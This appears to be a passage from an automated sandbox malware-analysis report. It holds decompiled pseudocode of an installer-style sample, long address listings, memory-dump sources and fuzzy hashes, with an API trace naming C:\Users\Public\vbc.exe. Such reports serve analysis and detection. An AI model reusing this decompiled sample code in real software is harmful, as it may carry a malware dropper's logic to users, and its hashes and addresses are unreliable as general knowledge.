											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                0x00000000
                                                0x004064dd
                                                0x004064dd
                                                0x004064e1
                                                0x0040650a
                                                0x00406514
                                                0x004064e3
                                                0x004064ec
                                                0x004064f9
                                                0x004064fc
                                                0x00406840
                                                0x00406840
                                                0x00406843
                                                0x00406843
                                                0x00406843
                                                0x00406849
                                                0x0040684f
                                                0x00406855
                                                0x0040686f
                                                0x00406872
                                                0x00406878
                                                0x00406883
                                                0x00406885
                                                0x00406857
                                                0x00406857
                                                0x00406866
                                                0x0040686a
                                                0x0040686a
                                                0x0040688f
                                                0x00000000
                                                0x00000000
                                                0x00406891
                                                0x00406895
                                                0x00406a44
                                                0x00406a5a
                                                0x00406a62
                                                0x00406a69
                                                0x00406a6b
                                                0x00406a72
                                                0x00406a76
                                                0x00406a76
                                                0x004068a1
                                                0x004068a8
                                                0x004068b0
                                                0x004068b3
                                                0x004068b6
                                                0x004068b6
                                                0x004068bc
                                                0x004068bc
                                                0x00406058
                                                0x00406058
                                                0x00406058
                                                0x00406061
                                                0x00000000
                                                0x00000000
                                                0x00406067
                                                0x00000000
                                                0x00406072
                                                0x00000000
                                                0x00000000
                                                0x0040607b
                                                0x0040607e
                                                0x00406081
                                                0x00406085
                                                0x00000000
                                                0x00000000
                                                0x0040608b
                                                0x0040608e
                                                0x00406090
                                                0x00406091
                                                0x00406094
                                                0x00406096
                                                0x00406097
                                                0x00406099
                                                0x0040609c
                                                0x004060a1
                                                0x004060a6
                                                0x004060af
                                                0x004060c2
                                                0x004060c5
                                                0x004060d1
                                                0x004060f9
                                                0x004060fb
                                                0x00406109
                                                0x00406109
                                                0x0040610d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004060fd
                                                0x004060fd
                                                0x00406100
                                                0x00406101
                                                0x00406101
                                                0x00000000
                                                0x004060fd
                                                0x004060d7
                                                0x004060dc
                                                0x004060dc
                                                0x004060e5
                                                0x004060ed
                                                0x004060f0
                                                0x00000000
                                                0x004060f6
                                                0x004060f6
                                                0x00000000
                                                0x004060f6
                                                0x00000000
                                                0x00406113
                                                0x00406113
                                                0x00406117
                                                0x004069c3
                                                0x00000000
                                                0x004069c3
                                                0x00406120
                                                0x00406130
                                                0x00406133
                                                0x00406136
                                                0x00406136
                                                0x00406136
                                                0x00406139
                                                0x0040613d
                                                0x00000000
                                                0x00000000
                                                0x0040613f
                                                0x00406145
                                                0x0040616f
                                                0x00406175
                                                0x0040617c
                                                0x00000000
                                                0x0040617c
                                                0x0040614b
                                                0x0040614e
                                                0x00406153
                                                0x00406153
                                                0x0040615e
                                                0x00406166
                                                0x00406169
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004061ae
                                                0x004061b4
                                                0x004061b7
                                                0x004061c4
                                                0x004061cc
                                                0x00406840
                                                0x00000000
                                                0x00000000
                                                0x00406183
                                                0x00406183
                                                0x00406187
                                                0x004069d2
                                                0x00000000
                                                0x004069d2
                                                0x00406193
                                                0x0040619e
                                                0x0040619e
                                                0x0040619e
                                                0x004061a1
                                                0x004061a4
                                                0x004061a7
                                                0x004061ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406843
                                                0x00406843
                                                0x00406849
                                                0x0040684f
                                                0x00406855
                                                0x0040686f
                                                0x00406872
                                                0x00406878
                                                0x00406883
                                                0x00406885
                                                0x00406857
                                                0x00406857
                                                0x00406866
                                                0x0040686a
                                                0x0040686a
                                                0x0040688f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004061d4
                                                0x004061d6
                                                0x004061d9
                                                0x0040624a
                                                0x0040624d
                                                0x00406250
                                                0x00406257
                                                0x00406261
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406840
                                                0x004061db
                                                0x004061df
                                                0x004061e2
                                                0x004061e4
                                                0x004061e7
                                                0x004061ea
                                                0x004061ec
                                                0x004061ef
                                                0x004061f1
                                                0x004061f6
                                                0x004061f9
                                                0x004061fc
                                                0x00406200
                                                0x00406207
                                                0x0040620a
                                                0x00406211
                                                0x00406215
                                                0x0040621d
                                                0x0040621d
                                                0x0040621d
                                                0x00406217
                                                0x00406217
                                                0x00406217
                                                0x0040620c
                                                0x0040620c
                                                0x0040620c
                                                0x00406221
                                                0x00406224
                                                0x00406242
                                                0x00406244
                                                0x00000000
                                                0x00406226
                                                0x00406226
                                                0x00406229
                                                0x0040622c
                                                0x0040622f
                                                0x00406231
                                                0x00406231
                                                0x00406231
                                                0x00406234
                                                0x00406237
                                                0x00406239
                                                0x0040623a
                                                0x0040623d
                                                0x00000000
                                                0x0040623d
                                                0x00000000
                                                0x00406473
                                                0x00406477
                                                0x00406495
                                                0x00406498
                                                0x0040649f
                                                0x004064a2
                                                0x004064a5
                                                0x004064a8
                                                0x004064ab
                                                0x004064ae
                                                0x004064b0
                                                0x004064b7
                                                0x004064b8
                                                0x004064ba
                                                0x004064bd
                                                0x004064c0
                                                0x004064c3
                                                0x004064c3
                                                0x004064c8
                                                0x00000000
                                                0x004064c8
                                                0x00406479
                                                0x0040647c
                                                0x0040647f
                                                0x00406489
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406520
                                                0x00406524
                                                0x00000000
                                                0x00000000
                                                0x0040652a
                                                0x0040652e
                                                0x00000000
                                                0x00000000
                                                0x00406534
                                                0x00406536
                                                0x0040653a
                                                0x0040653a
                                                0x0040653d
                                                0x00406541
                                                0x00000000
                                                0x00000000
                                                0x00406591
                                                0x00406595
                                                0x0040659c
                                                0x0040659f
                                                0x004065a2
                                                0x004065ac
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406840
                                                0x00406597
                                                0x00000000
                                                0x00000000
                                                0x004065b8
                                                0x004065bc
                                                0x004065c3
                                                0x004065c6
                                                0x004065c9
                                                0x004065be
                                                0x004065be
                                                0x004065be
                                                0x004065cc
                                                0x004065cf
                                                0x004065d2
                                                0x004065d2
                                                0x004065d5
                                                0x004065d8
                                                0x004065db
                                                0x004065db
                                                0x004065de
                                                0x004065e5
                                                0x004065ea
                                                0x00000000
                                                0x00000000
                                                0x00406678
                                                0x00406678
                                                0x0040667c
                                                0x00406a1a
                                                0x00000000
                                                0x00406a1a
                                                0x00406682
                                                0x00406685
                                                0x00406688
                                                0x0040668c
                                                0x0040668f
                                                0x00406695
                                                0x00406697
                                                0x00406697
                                                0x00406697
                                                0x0040669a
                                                0x0040669d
                                                0x00000000
                                                0x00000000
                                                0x0040626d
                                                0x0040626d
                                                0x00406271
                                                0x004069de
                                                0x00000000
                                                0x004069de
                                                0x00406277
                                                0x0040627a
                                                0x0040627d
                                                0x00406281
                                                0x00406284
                                                0x0040628a
                                                0x0040628c
                                                0x0040628c
                                                0x0040628c
                                                0x0040628f
                                                0x00406292
                                                0x00406292
                                                0x00406295
                                                0x00406298
                                                0x00000000
                                                0x00000000
                                                0x0040629e
                                                0x004062a4
                                                0x00000000
                                                0x00000000
                                                0x004062aa
                                                0x004062aa
                                                0x004062ae
                                                0x004062b1
                                                0x004062b4
                                                0x004062b7
                                                0x004062ba
                                                0x004062bb
                                                0x004062be
                                                0x004062c0
                                                0x004062c6
                                                0x004062c9
                                                0x004062cc
                                                0x004062cf
                                                0x004062d2
                                                0x004062d5
                                                0x004062d8
                                                0x004062f4
                                                0x004062f7
                                                0x004062fa
                                                0x004062fd
                                                0x00406304
                                                0x00406308
                                                0x0040630a
                                                0x0040630e
                                                0x004062da
                                                0x004062da
                                                0x004062de
                                                0x004062e6
                                                0x004062eb
                                                0x004062ed
                                                0x004062ef
                                                0x004062ef
                                                0x00406311
                                                0x00406318
                                                0x0040631b
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406326
                                                0x00406326
                                                0x0040632a
                                                0x004069ea
                                                0x00000000
                                                0x004069ea
                                                0x00406330
                                                0x00406333
                                                0x00406336
                                                0x0040633a
                                                0x0040633d
                                                0x00406343
                                                0x00406345
                                                0x00406345
                                                0x00406345
                                                0x00406348
                                                0x0040634b
                                                0x0040634b
                                                0x0040634b
                                                0x00406351
                                                0x00000000
                                                0x00000000
                                                0x00406353
                                                0x00406356
                                                0x00406359
                                                0x0040635c
                                                0x0040635f
                                                0x00406362
                                                0x00406365
                                                0x00406368
                                                0x0040636b
                                                0x0040636e
                                                0x00406371
                                                0x00406389
                                                0x0040638c
                                                0x0040638f
                                                0x00406392
                                                0x00406392
                                                0x00406395
                                                0x00406399
                                                0x0040639b
                                                0x00406373
                                                0x00406373
                                                0x0040637b
                                                0x00406380
                                                0x00406382
                                                0x00406384
                                                0x00406384
                                                0x0040639e
                                                0x004063a5
                                                0x004063a8
                                                0x00000000
                                                0x004063aa
                                                0x00000000
                                                0x004063aa
                                                0x004063a8
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x00000000
                                                0x00000000
                                                0x004063ea
                                                0x004063ea
                                                0x004063ee
                                                0x004069f6
                                                0x00000000
                                                0x004069f6
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x004064cb
                                                0x004064cb
                                                0x004064ce
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00000000
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406840
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00000000
                                                0x004068fe
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x004068bc
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617
                                                0x0040661e
                                                0x00406621
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00000000
                                                0x00406914
                                                0x00406914
                                                0x00406918
                                                0x00406a50
                                                0x00000000
                                                0x00406a50
                                                0x0040691e
                                                0x00406921
                                                0x00406924
                                                0x00406928
                                                0x0040692b
                                                0x00406931
                                                0x00406933
                                                0x00406933
                                                0x00406933
                                                0x00406936
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x0040693c
                                                0x0040693c
                                                0x00406940
                                                0x004069a0
                                                0x004069a3
                                                0x004069a8
                                                0x004069a9
                                                0x004069ab
                                                0x004069ad
                                                0x004069b0
                                                0x004068bc
                                                0x004068bc
                                                0x00000000
                                                0x004068c2
                                                0x004068bc
                                                0x00406942
                                                0x00406948
                                                0x0040694b
                                                0x0040694e
                                                0x00406951
                                                0x00406954
                                                0x00406957
                                                0x0040695a
                                                0x0040695d
                                                0x00406960
                                                0x00406963
                                                0x0040697c
                                                0x0040697f
                                                0x00406982
                                                0x00406985
                                                0x00406989
                                                0x0040698b
                                                0x0040698b
                                                0x0040698c
                                                0x0040698f
                                                0x00406965
                                                0x00406965
                                                0x0040696d
                                                0x00406972
                                                0x00406974
                                                0x00406977
                                                0x00406977
                                                0x00406992
                                                0x00406999
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00000000
                                                0x00406798
                                                0x00000000
                                                0x00406798
                                                0x00406796
                                                0x004066a9
                                                0x004066ac
                                                0x004066ae
                                                0x004066b1
                                                0x004066b4
                                                0x004066b7
                                                0x004066b9
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066c2
                                                0x004066c2
                                                0x004066c5
                                                0x004066cc
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x00000000
                                                0x004066ce
                                                0x00000000
                                                0x004066ce
                                                0x004066cc
                                                0x00406652
                                                0x00406655
                                                0x00406657
                                                0x0040665a
                                                0x00000000
                                                0x00000000
                                                0x004063b9
                                                0x004063b9
                                                0x004063bd
                                                0x00406a02
                                                0x00000000
                                                0x00406a02
                                                0x004063c3
                                                0x004063c6
                                                0x004063c9
                                                0x004063cc
                                                0x004063cf
                                                0x004063d2
                                                0x004063d5
                                                0x004063d7
                                                0x004063da
                                                0x004063dd
                                                0x004063e0
                                                0x004063e2
                                                0x004063e2
                                                0x004063e2
                                                0x00000000
                                                0x00000000
                                                0x00406544
                                                0x00406544
                                                0x00406548
                                                0x00406a0e
                                                0x00000000
                                                0x00406a0e
                                                0x0040654e
                                                0x00406551
                                                0x00406554
                                                0x00406557
                                                0x00406559
                                                0x00406559
                                                0x00406559
                                                0x0040655c
                                                0x0040655f
                                                0x00406562
                                                0x00406565
                                                0x00406568
                                                0x0040656b
                                                0x0040656c
                                                0x0040656e
                                                0x0040656e
                                                0x0040656e
                                                0x00406571
                                                0x00406574
                                                0x00406577
                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x0040657d
                                                0x0040657f
                                                0x0040657f
                                                0x00000000
                                                0x00000000
                                                0x004067c1
                                                0x004067c1
                                                0x004067c1
                                                0x004067c5
                                                0x00000000
                                                0x00000000
                                                0x004067cb
                                                0x004067ce
                                                0x004067d1
                                                0x004067d4
                                                0x004067d6
                                                0x004067d6
                                                0x004067d6
                                                0x004067d9
                                                0x004067dc
                                                0x004067df
                                                0x004067e2
                                                0x004067e5
                                                0x004067e8
                                                0x004067e9
                                                0x004067eb
                                                0x004067eb
                                                0x004067eb
                                                0x004067ee
                                                0x004067f1
                                                0x004067f4
                                                0x004067f7
                                                0x004067fa
                                                0x004067fe
                                                0x00406800
                                                0x00406803
                                                0x00000000
                                                0x00406805
                                                0x00406582
                                                0x00406582
                                                0x00000000
                                                0x00406582
                                                0x00406803
                                                0x00406a38
                                                0x00000000
                                                0x00000000
                                                0x00406067
                                                0x00406a6f
                                                0x00406a6f
                                                0x00000000
                                                0x00406a6f
                                                0x004068bc
                                                0x00406843
                                                0x00406840

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                                • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423f70; // 0x6029b4
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42372c =  *0x42372c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42372c, 0x7530,  *0x423714), 0);
					}
				}
				return 0;
			}












                                                0x0040138a
                                                0x004013fa
                                                0x00401392
                                                0x0040139b
                                                0x004013a0
                                                0x00000000
                                                0x00000000
                                                0x004013a2
                                                0x004013a3
                                                0x004013ad
                                                0x00000000
                                                0x00401404
                                                0x004013b0
                                                0x004013b7
                                                0x004013bd
                                                0x004013be
                                                0x004013c0
                                                0x004013c2
                                                0x004013b9
                                                0x004013b9
                                                0x004013ba
                                                0x004013ba
                                                0x004013c9
                                                0x004013cb
                                                0x004013f4
                                                0x004013f4
                                                0x004013c9
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                                • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405F28, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405F28(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EBA(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                0x00405f30
                                                0x00405f33
                                                0x00405f3a
                                                0x00405f42
                                                0x00405f4e
                                                0x00000000
                                                0x00405f55
                                                0x00405f45
                                                0x00405f4c
                                                0x00000000
                                                0x00405f5d
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                                  • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                                  • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                                  • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                                • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040586F, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 68%
                                                			E0040586F(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                0x00405873
                                                0x00405880
                                                0x00405895
                                                0x0040589b

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405873
                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                Uniqueness

